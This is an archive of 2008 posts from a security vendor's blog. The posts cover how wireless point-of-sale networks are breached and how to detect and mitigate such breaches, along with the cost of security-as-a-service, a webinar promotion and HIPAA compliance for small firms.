Content Migration

September 25, 2008


The content of this blog will be moving to Therefore, you can find new and interesting posts at or for this point on.


Anatomy of a Data Breach Part 3 – The Wireless Hack

July 17, 2008

Wireless networks and endpoints offer convenience and connectivity. Unless properly secured, they also offer a means of egress into the network. This article will describe the vulnerabilities and strategies for mitigation.

In the wake of undiscovered data breaches and subsequent public exposure, hackers have begun to turn their eye towards breaching wireless networks and taking advantage of the many weaknesses incumbent. Furthermore, we are seeing a trend towards stealing cardholder information from retailers such as TJ Max and Hannaford Brothers as a quick way to gain profit.

The use of mobile networks is not an uncommon way of providing access for employees anywhere anytime throughout the corporate campus. However wireless networks come with several often ignored dangers:

• Exploitation of WEP and WPA protocols.

• Impersonation and interception of wireless traffic.

• Access points being deployed with little or no security enabled.

All of these vulnerabilities can eventually lead to the exposure of private information if not properly secured and accounted for when implementing a data security policy. The weaknesses of a wireless environment can often lead to violations of PCI, HIPAA & SOX if an exposure were to occur through one of those vulnerabilities. Regulations such as SOX, HIPAA and PCI were ultimately designed to protect specific classes of information that if exposed can cause serious ramifications such as: fines, potential jail time and a host of other unwanted aftereffects.

The Target: Wireless Point-of-Sales (POS)

For example the protection of cardholder information as covered under PCI-DSS includes a number of guidelines to aide in the development of policy that (a) protects cardholder information stored on servers and (b) protects cardholder information that may be in transit via transactions that occur between front-end point-of-sales terminals, to backend merchant processing servers (the machines that handle and authorize transactions when a credit card is swiped at a store location).


Because the target is often cardholder information – meaning it has a higher raw value on the black-market then other information like a social security number, hackers are developing strategies that involve breaching wireless networks – mainly because it is much easier to penetrate then cracking the corporate firewall and obtaining access via the external gateway.

This is a stepping ground to harvesting data at rest, but in motion as well. The methodology behind this goes in tangent with the “low hanging fruit” theory and part of an overall emerging trend towards gaining access to cardholder information.

Cracking the Wireless Network

Wireless hacks attributed to around 9% of the security incidents documented in a recent report published by the Verizon Business Risk team. This is likely due to incorrectly configured access points or the use of weak authentication ; WPA-PSK in some cases can be vulnerable to offline dictionary attacks if given enough time to decode the captured traffic. WEP on the other hand can be cracked in less than 10 minutes using commercially available tools on the market.

For wireless hacks to be successful without investing a large amount of time and resources the access point either has to have a vulnerable encryption protocol enabled such as WEP or WPA-PSK or not have security enabled at all – which has been seen in the field numerous times.

As data security issues become the number one problem, hackers will continue to innovate and find additional ways of accessing the information they want. Penetrating a wireless network and planting targeted malware only recently emerged on the scene and is expected to increase; especially being that cardholder information is one of the primary targets of interest when it comes to data of value.

Thus, one popular method being used today is the development of targeted malware to intercept transmissions and to extract credit card information and other sensitive data directly from these streams .

However; it all starts with penetrating the wireless network and obtaining the ability to access its resources – as we have seen the weaker link in the chain is often targeted first (stores or regional offices in the field). Some recent breaches have led to malware being physically installed on key servers and the avenue for attack was through a wireless network at a field office.

Theories on how this malware would work would be using filters to detect certain packets with specific information (e.g. credit numbers, social security numbers, authorization codes and pin numbers all of which are of value). Another theory is capturing the details in real-time by installing Trojans that directly interact with the application on the POS terminal, thus, capturing the customer’s information in real-time as it exits the POS to the payment authorization gateway.


Once the malware has captured the necessary data it can open a channel with a command and control server and upload the stolen information – it is often found that the C&C server will also be connected to thousands of compromised PCs; subsequently distributing the stolen data to be stored on a consumer’s PC. The chilling part is any consumer’s PC can instantly become a drop-box for stolen corporate information once it has been compromised by hackers.

As mentioned before hackers will target wireless networks located at smaller regional offices as they did with Hannaford and TJX Max This is done under the assumption that security is weaker then at corporate HQ and fits part in parcel with them being “low hanging fruit”. This is probably true given the technical resources available and the diversity that smaller locations have.

Discovery and Prevention

Determining if you have been breached is somewhat difficult as the intruders have likely covered their initial entry by hiding any physical traces (deleting or hiding audit logs, etc). Therefore, your best approach is to adopt a strategy for detecting and mitigating the effects of a breach such as:

• Database monitoring: Technologies exist to monitor SQL and Oracle databases for suspicious activity (access from unauthorized users, insertion of scripts, execution of SQL statements, etc). Monitoring is only part of the equation to detecting an actual breach in progress. If hackers subsequently decide to access cardholder information stored in your databases in addition to extracting the data in real-time; database monitoring will increase the odds of discovering unauthorized access.

• Network Intrusion Detection: Intrusion detection technologies in addition to other methods can be used to detect anomalous traffic and behavior that might be associated with an attack.

• Hardening critical assets: You can minimize your exposure & risk by hardening critical assets (in this case the POS terminal); in other words you are removing non essential functionality such as services, applications and ports that not only adds to the complexity, but introduces additional risk.

Yesterday’s Webinar Available!

May 22, 2008

Yesterday’s webinar on Customer Privacy, Malware and Government Regulations is now available for your viewing pleasure. Enjoy!



Why Security-as-a-Service reduces total cost of ownership (TCO)

May 22, 2008

Recently I have been getting a number of questions concerning the cost savings of a security-as-a-service (SaaS) model versus a traditional on-premise solution. While there are certainly a number of direct benefits to the end-user (easier to use and easier to upgrade), I thought for the purpose of this article to elaborate on the most important one: reducing the total cost of ownership (TCO) via the outsourcing of security services”.

So what is exactly meant by reducing the total cost of ownership? Well according to industry analysts a good portion of small to medium sized companies out-source their security services to a 3rd party provider. Obviously this strategy has real benefits especially to companies who lack the technical ability to manage and maintain an on-premise anti-malware solution.

Because SaaS traditionally hasn’t resided on-premise it takes the overhead of managing and maintaining a complex myriad of technologies and places the responsibility with the provider. Take for example a small medicare facility with 100 employees; now if we factor in the following variables into the equation and apply it to a SaaS model we can clearly see the reduction in TCO:

Direct costs with an on-premise solution:

* 2 hrs to install the management server at $200 per hr (average technical consultation fee)

* $1000 to $1500 for hardware (necessary for the management server)

* $800 to $1000 for Microsoft Windows 2003 Server licenses

Overall initial cost (not including the anti-malware licenses or the yearly technical support contract to support various products – i.e the server, the anti-malware product, etc) = $2900

Direct costs with a SaaS solution:

A SaaS solution does not have any direct costs in terms of infrastructure or on-going management as it is being out-sourced (the only associated costs are that of the anti-malware subscription). With an on-premise solution there is a much higher initial and on-going cost as hardware tends to require maintenance and because their is a lack of technical skill in-house; outside help is required to maintain the anti-malware product.

In conclusion SaaS promises to revert the trend and reduce costs while helping mid-size companies to realize security, but within their budgets.


Eleven months of writing for the Information Security Systems Association Journal

May 20, 2008

I have been writing now for eleven months in the Information Security Systems Association Journal (ISSA). These articles have been primarly focused along the lines of sharing information concerning the emerging threat-landscape and what we are seeing from a Panda Security perspective. Therefore; I thought I would share a little history with you by making these articles available for download.

* The Crimeware Ecosystem

* Targeted Scams: A new Trend

* From Traditional AV to Collective Intelligence

* The Silent Epidemic (the very first article)

* Targeted Financial Attacks

* Server-Side Polymorphism

Thoughts or comments?


Webinar on Privacy and Security – Win a Garmin GPS!

May 20, 2008

Free Live Webinar on May 21 @ 10AM PST / 1PM EST

New breeds of malware – spyware, adware, Trojans, and viruses – are rapidly infecting networks and exposing businesses and their customers to unprecedented security risks. The government is now mandating that corporations effectively protect the privacy of individuals and ensure the confidentiality and integrity of sensitive information.

Protect Your Corporate Information and Assets!

Get 16 tips to help you protect your corporate network from malware threats:

• 3 ways to safeguard against malware threats and comply with regulatory standards
• 5 technical safeguards that will significantly reduce your enterprise’s risk
• 3 ways to measure inadequacies during a security audit and if assets are already being compromised with
undetected malware
• 5 ways to evolve security best practices for crimeware and potential infection targets and Panda Security US have partnered to offer you this exclusive FREE live webinar.

Join us for a chance to win
Attendees to the live webinar will be entered for a chance to win a Garmin GPS. One winner will be selected from the audience by random drawing.*


Technology - The internets fastest growing blog directory

How regulations affect small to mid-size companies

May 20, 2008

It’s important to note that not only are large corporations affected by regulatory standards, but the small and mid-size companies are also equally affected; especially when their core business is dealing with protected classes of information by law (patient information, credit card information, financial data, etc).

A very good example is a regional medicare facility that has less then 500 employees. Now one may think that they are not subject to the same regulations mainly because of their size, but HIPAA is HIPAA and it applies to any organization that stores and maintains patient privileged information. 

For example if this fictional medicare facility were to have a screen-logger on a PC containing any of the above classes of information this could lead to a potential violation of the following and could result in fines:

HIPAA §164.308(a) (4) that pertains to protecting health information: “implement technical policies and procedures for electronic information systems that maintain electronic protected health information to allow access only to those persons or software programs that have been granted access rights as specified in §164.308(a) (4) [Information Access Management]”

It also leads me to believe that controls implemented around enforcing compliance doesn’t always lead to assurance that one is protected. This is particulary true regarding the recent high profile data security breaches occurring with corporations that have all followed regulatory standards, but some how were still compromised.

In conclusion security should not be ignored within small and mid-size companies. Especially if these companies handle protected classes of information.